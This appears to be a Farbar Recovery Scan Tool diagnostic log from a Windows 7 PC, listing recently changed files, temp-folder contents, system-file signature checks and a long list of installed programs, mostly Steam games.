2014-10-29 19:49 - 2014-09-19 17:35 - 01802752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-29 19:49 - 2014-09-19 17:34 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-10-29 19:49 - 2013-08-27 04:01 - 01545728 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2014-10-29 19:49 - 2013-08-27 04:01 - 01143296 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2014-10-29 19:49 - 2013-08-27 03:21 - 01077760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2014-10-17 00:53 - 2014-10-17 00:53 - 00000000 ____D () C:\Users\Calahan\Downloads\Lower shadow map mod V4
2014-10-17 00:50 - 2014-10-17 00:50 - 00013020 _____ () C:\Users\Calahan\Downloads\Lower shadow map mod V4.pdmod
2014-10-16 23:07 - 2014-10-16 23:07 - 00000000 ____D () C:\Users\Calahan\AppData\Local\PAYDAY
2014-10-16 02:39 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-16 02:39 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-16 02:39 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-16 02:39 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 02:39 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 02:39 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-16 02:39 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-16 02:39 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 02:39 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-16 02:39 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 02:38 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 02:38 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-16 02:38 - 2014-08-28 21:07 - 05780480 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-16 02:38 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-10-16 02:38 - 2014-08-28 21:07 - 00322560 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-16 02:38 - 2014-08-28 21:07 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2014-10-16 02:38 - 2014-08-28 21:06 - 01125888 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-16 02:38 - 2014-08-28 20:44 - 04922368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-16 02:38 - 2014-08-28 20:44 - 01050112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-16 02:38 - 2014-08-28 20:44 - 00269312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-16 02:38 - 2014-08-28 20:44 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2014-10-16 02:37 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 02:37 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-16 02:37 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-16 02:37 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-16 02:37 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-16 02:37 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-16 02:37 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-16 02:37 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-16 02:37 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-16 02:37 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-16 02:37 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-16 02:37 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-16 02:37 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-16 02:37 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-16 02:37 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers
 
\tssecsrv.sys
2014-10-15 18:51 - 2014-10-15 18:52 - 00863820 _____ () C:\Users\Calahan\Downloads\Nosferatu.7z
2014-10-12 01:05 - 2014-10-12 01:05 - 00000000 ____D () C:\Users\Calahan\AppData\Local\IsolatedStorage
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-10 22:45 - 2013-09-17 13:02 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-10 22:25 - 2013-09-18 10:42 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-10 20:54 - 2011-05-31 15:30 - 00001945 _____ () C:\Windows\epplauncher.mif
2014-11-10 20:27 - 2009-07-13 23:45 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-
 
5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-10 20:27 - 2009-07-13 23:45 - 00021680 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-
 
5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-10 20:25 - 2009-07-14 00:13 - 00786662 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-10 20:24 - 2011-05-26 18:45 - 01295483 _____ () C:\Windows\WindowsUpdate.log
2014-11-10 20:21 - 2014-06-28 01:20 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Raptr
2014-11-10 20:18 - 2013-09-18 10:42 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-10 20:18 - 2011-05-26 19:15 - 00485104 _____ () C:\Windows\PFRO.log
2014-11-10 20:18 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-10 20:18 - 2009-07-13 23:51 - 00057091 _____ () C:\Windows\setupact.log
2014-11-10 20:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\Resources
2014-11-10 19:28 - 2013-12-30 18:00 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-11-10 19:11 - 2014-06-25 17:33 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Skype
2014-11-10 18:53 - 2014-02-28 16:31 - 00000000 ____D () C:\Users\Calahan\AppData\Local\CrashDumps
2014-11-04 16:36 - 2014-02-28 16:37 - 00000000 ____D () C:\Users\Calahan\Documents\My Games
2014-11-04 16:36 - 2014-02-28 16:23 - 00545972 _____ () C:\Windows\DirectX.log
2014-11-04 15:59 - 2009-07-14 00:32 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2014-11-02 23:25 - 2014-06-30 17:19 - 00000000 ____D () C:\Program Files (x86)\Overwolf
2014-10-30 21:35 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-30 18:18 - 2014-06-30 17:18 - 00000000 ____D () C:\Users\Calahan\AppData\Local\Overwolf
2014-10-30 06:25 - 2011-05-26 16:47 - 00275080 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\zh-HK
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\SysWOW64\tr-TR
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-10-30 02:18 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-10-29 11:26 - 2013-09-18 10:43 - 00002193 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-21 12:20 - 2013-09-18 10:42 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-21 12:20 - 2013-09-18 10:42 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-20 22:58 - 2014-10-07 22:24 - 00000000 ____D () C:\Users\Calahan\AppData\Roaming\Mount&Blade With Fire and 
 
Sword
2014-10-20 15:02 - 2014-06-27 21:05 - 00000000 ____D () C:\Users\Calahan\Downloads\pdmod_tool_v1.15_fix1
2014-10-17 03:50 - 2009-07-13 23:45 - 00416704 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-17 03:50 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs
 
\Accessories
2014-10-17 03:48 - 2014-05-15 02:26 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-17 02:19 - 2011-05-26 17:08 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-17 02:14 - 2013-09-17 12:32 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 02:00 - 2011-05-31 15:31 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-15 18:06 - 2009-07-14 00:08 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
 
Some content of TEMP:
====================
C:\Users\administrator\AppData\Local\Temp\ApnStub.exe
C:\Users\administrator\AppData\Local\Temp\HPHASUtil.exe
C:\Users\administrator\AppData\Local\Temp\jre-6u35-windows-i586-iftw.exe
C:\Users\administrator\AppData\Local\Temp\MSN874A.exe
C:\Users\administrator\AppData\Local\Temp\uninstall.exe
C:\Users\administrator\AppData\Local\Temp\UninstallHPTCA.exe
C:\Users\Administrator.cvci20462\AppData\Local\Temp\jre-6u37-windows-i586-iftw.exe
C:\Users\Calahan\AppData\Local\Temp\raptrpatch.exe
C:\Users\Calahan\AppData\Local\Temp\raptr_stub.exe
C:\Users\Calahan\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Calahan\AppData\Local\Temp\stuprt.exe
C:\Users\Calahan\AppData\Local\Temp\xmlUpdater.exe
C:\Users\Logan\AppData\Local\Temp\jre-7u60-windows-i586-iftw.exe
C:\Users\Mike2\AppData\Local\Temp\appupdater-{835E6293-B3C4-B247-9C49-3213713F7FC7}.exe
C:\Users\Mike2\AppData\Local\Temp\jre-7u40-windows-i586-iftw.exe
C:\Users\Mike2\AppData\Local\Temp\jre-7u45-windows-i586-iftw.exe
C:\Users\Mike2\AppData\Local\Temp\MouseKeyboardCenterx64_1033.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-26 09:18
 
==================== End Of Log ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014
Ran by Calahan at 2014-11-10 22:58:19
Running from C:\Users\Calahan\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
0RBITALIS (HKLM-x32\...\Steam App 278440) (Version:  - Alan Zucconi)
140 (HKLM-x32\...\Steam App 242820) (Version:  - Carlsen Games)
3079 -- Block Action RPG (HKLM-x32\...\Steam App 259620) (Version:  - Phr00t's Software)
3089 -- Futuristic Action RPG (HKLM-x32\...\Steam App 263360) (Version:  - Phr00t's Software)
6180 the moon (HKLM-x32\...\Steam App 299660) (Version:  - Turtle Cream)
64 Bit HP CIO Components Installer (Version: 7.2.5 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
7-Zip 9.22beta (HKLM-x32\...\7-Zip) (Version:  - )
8BitMMO (HKLM-x32\...\Steam App 250420) (Version:  - Archive Entertainment)
A Wizard's Lizard (HKLM-x32\...\Steam App 280040) (Version:  - Lost Decade Games)
Actify SpinFire 9.0 (HKLM-x32\...\Actify SpinFire 9.0) (Version: 11.0.1435.1507.3 - Actify, Inc.)
Actify SpinFire 9.0 (x32 Version: 11.0.1435.1507.3 - Actify Inc) Hidden
ActivClient x64 (HKLM\...\{86E45973-5352-439F-A115-2E8EE4D40140}) (Version: 6.2 - ActivIdentity)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.06) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.06 - Adobe Systems Incorporated)
Alan Wake (HKLM-x32\...\Steam App 108710) (Version:  - Remedy Entertainment)
AMD Catalyst Install Manager (HKLM\...\{6119B3A6-3603-9695-0398-CDF2AF0A13F8}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Another World (HKLM-x32\...\Steam App 233550) (Version:  - Eric Chahi)
Anzio Lite 12.6 (HKLM-x32\...\{1F938630-5205-4C8C-81EA-D9ECFC8CA507}) (Version:  - )
ATI Problem Report Wizard (Version: 3.0.750.0 - ATI Technologies) Hidden
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version:  - Ronimo Games)
Bastion (HKLM-x32\...\Steam App 107100) (Version:  - Supergiant Games)
Belarc Advisor 8.3 (HKLM-x32\...\Belarc Advisor) (Version: 8.3.2.0 - Belarc Inc.)
Breach & Clear (HKLM-x32\...\Steam App 266130) (Version:  - Mighty Rabbit Studios)
calibre (HKLM-x32\...\{D0940326-79BF-4D05-98CA-ED208661D34B}) (Version: 1.19.0 - Kovid Goyal)
CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) Hidden
Caribbean! (HKLM-x32\...\Steam App 293010) (Version:  - Snowbird Games)
Castle Crashers (HKLM-x32\...\Steam App 204360) (Version:  - The Behemoth)
Dark Souls: Prepare to Die Edition (HKLM-x32\...\Steam App 211420) (Version:  - FromSoftware)
DARK SOULS™ II (HKLM-x32\...\Steam App 236430) (Version:  - FromSoftware, Inc)
Darwinia (HKLM-x32\...\Steam App 1500) (Version:  - Introversion Software)
DriverTuner 3.5.0.1 (HKLM-x32\...\{520C1D80-935C-42B9-9340-E883849D804F}_is1) (Version: 3.5.0.1 - LionSea Software co., ltd)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
FAHClient (HKLM-x32\...\FAHClient) (Version: 7.3.6 - Stanford University)
Fallout: New Vegas (HKLM-x32\...\Steam App 22380) (Version:  - Obsidian Entertainment)
FileZilla Client 3.5.2 (HKLM-x32\...\FileZilla Client) (Version: 3.5.2 - FileZilla Project)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Gunpoint (HKLM-x32\...\Steam App 206190) (Version:  - Suspicious Developments)
Hack 'n' Slash (HKLM-x32\...\Steam App 246070) (Version:  - Double Fine Productions)
Hammerwatch (HKLM-x32\...\Steam App 239070) (Version:  - )
Hero of Many (HKLM-x32\...\Steam App 297370) (Version:  - Trickster Arts)
Hotline Miami (HKLM-x32\...\Steam App 219150) (Version:  - Dennaton Games)
HydraVision (x32 Version: 4.2.116.0 - ATI Technologies Inc.) Hidden
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.7.0 - LIGHTNING UK!)
Infested Planet (HKLM-x32\...\Steam App 204530) (Version:  - Rocket Bear Games)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.0.1006 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Network Connections 14.6.10.0 (HKLM\...\PROSetDX) (Version: 14.6.10.0 - Intel)
Java 7 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217045FF}) (Version: 7.0.600 - Oracle)
Jazzpunk (HKLM-x32\...\Steam App 250260) (Version:  - Necrophone Games)
Kerbal Space Program (HKLM-x32\...\Steam App 220200) (Version:  - Squad)
Khet 2.0 (HKLM-x32\...\Steam App 312720) (Version:  - BlueLine Games)
Killing Floor (HKLM-x32\...\Steam App 1250) (Version:  - Tripwire Interactive)
Kinetic Void (HKLM-x32\...\Steam App 227160) (Version:  - Badland Studio)
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)
LYNE (HKLM-x32\...\Steam App 266010) (Version:  - Thomas Bowker)
Magicka (HKLM-x32\...\Steam App 42910) (Version:  - Arrowhead Game Studios)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Max Payne 2: The Fall of Max Payne (HKLM-x32\...\Steam App 12150) (Version:  - Remedy Entertainment)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Project Professional 2010 (HKLM-x32\...\Office14.PRJPRO) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Visio Professional 2010 (HKLM-x32\...\Office14.VISIO) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Mini Metro (HKLM-x32\...\Steam App 287980) (Version:  - Dinosaur Polo Club)
Monaco (HKLM-x32\...\Steam App 113020) (Version:  - Pocketwatch Games)
Mount & Blade: Warband (HKLM-x32\...\Steam App 48700) (Version:  - TaleWorlds Entertainment)
Mount & Blade: With Fire and Sword (HKLM-x32\...\Steam App 48720) (Version:  - TaleWorlds Entertainment)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Multiwinia (HKLM-x32\...\Steam App 1530) (Version:  - Introversion Software)
Nidhogg (HKLM-x32\...\Steam App 94400) (Version:  - Messhof)
Nosferatu: The Wrath of Malachi (HKLM-x32\...\Steam App 283290) (Version:  - Idol FX)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.7 - )
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.81.34.0 - Overwolf Ltd.)
PANTECH Handset USB Driver (HKLM\...\{B9676D15-E0EC-42c2-8C16-F3D9648C44AF}) (Version: 1.1.4580.1215 - PANTECH CO,.LTD)
Pantech PCSuite (HKLM-x32\...\{69187EC5-F5CF-4B2C-B920-5A17F44D9685}) (Version: 1.0 - Pantech)
Pantech PCSuite (x32 Version: 1.0 - Pantech) Hidden
Papers, Please (HKLM-x32\...\Steam App 239030) (Version:  - 3909)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
PAYDAY: The Heist (HKLM-x32\...\Steam App 24240) (Version:  - OVERKILL Software)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.5.1 - Frank Heindörfer, Philip Chinery)
Plantronics® GameCom 780 Software for Dolby® Headphone (HKLM-x32\...\{EB3C9064-9140-4279-9E51-965119402151}) (Version: 1.00.0001 - Plantronics)
Prison Architect (HKLM-x32\...\Steam App 233450) (Version:  - Introversion Software)
Prototype (HKLM-x32\...\Steam App 10150) (Version:  - Radical Entertainment)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Quake III Arena (HKLM-x32\...\Steam App 2200) (Version:  - id Software)
Raptr (HKLM-x32\...\Raptr) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5886 - Realtek Semiconductor Corp.)
Receiver (HKLM-x32\...\Steam App 234190) (Version:  - Wolfire Games)
Return to Castle Wolfenstein (HKLM-x32\...\Steam App 9010) (Version:  - Gray Matter Studios)
Risk of Rain (HKLM-x32\...\Steam App 248820) (Version:  - )
Rogue Shooter: The FPS Roguelike (HKLM-x32\...\Steam App 295770) (Version:  - Hippomancer)
RollerCoaster Tycoon 2: Triple Thrill Pack (HKLM-x32\...\Steam App 285330) (Version:  - Chris Sawyer Productions)
RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version:  - Frontier)
RUNNING WITH RIFLES (HKLM-x32\...\Steam App 270150) (Version:  - Modulaatio Games)
Safecracker: The Ultimate Puzzle Adventure (HKLM-x32\...\Steam App 3260) (Version:  - Kheops Studio)
Sang-Froid - Tales of Werewolves (HKLM-x32\...\Steam App 227220) (Version:  - Artifice Studio)
Secrets of Rætikon (HKLM-x32\...\Steam App 246680) (Version:  - Broken Rules)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-003B-0000-0000-0000000FF1CE}_Office14.PRJPRO_{58FA40EF-ABA9-4FED-AD3D-318A6073934D}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0057-0000-0000-0000000FF1CE}_Office14.VISIO_{359ADBEC-068A-4CC9-9174-77AB8EDB867A}) (Version:  - Microsoft)
Shadowgate (HKLM-x32\...\Steam App 294440) (Version:  - Zojoi)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.3.16540.9015 - Microsoft Corporation)
Skype™ 6.20 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.)
SpaceChem (HKLM-x32\...\Steam App 92800) (Version:  - Zachtronics)
SpinFire 9.0 Core (x32 Version: 9.0.1435.1435 - Actify, Inc) Hidden
Star Wars: Knights of the Old Republic (HKLM-x32\...\Steam App 32370) (Version:  - BioWare)
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Sunless Sea (HKLM-x32\...\Steam App 304650) (Version:  - Failbetter Games)
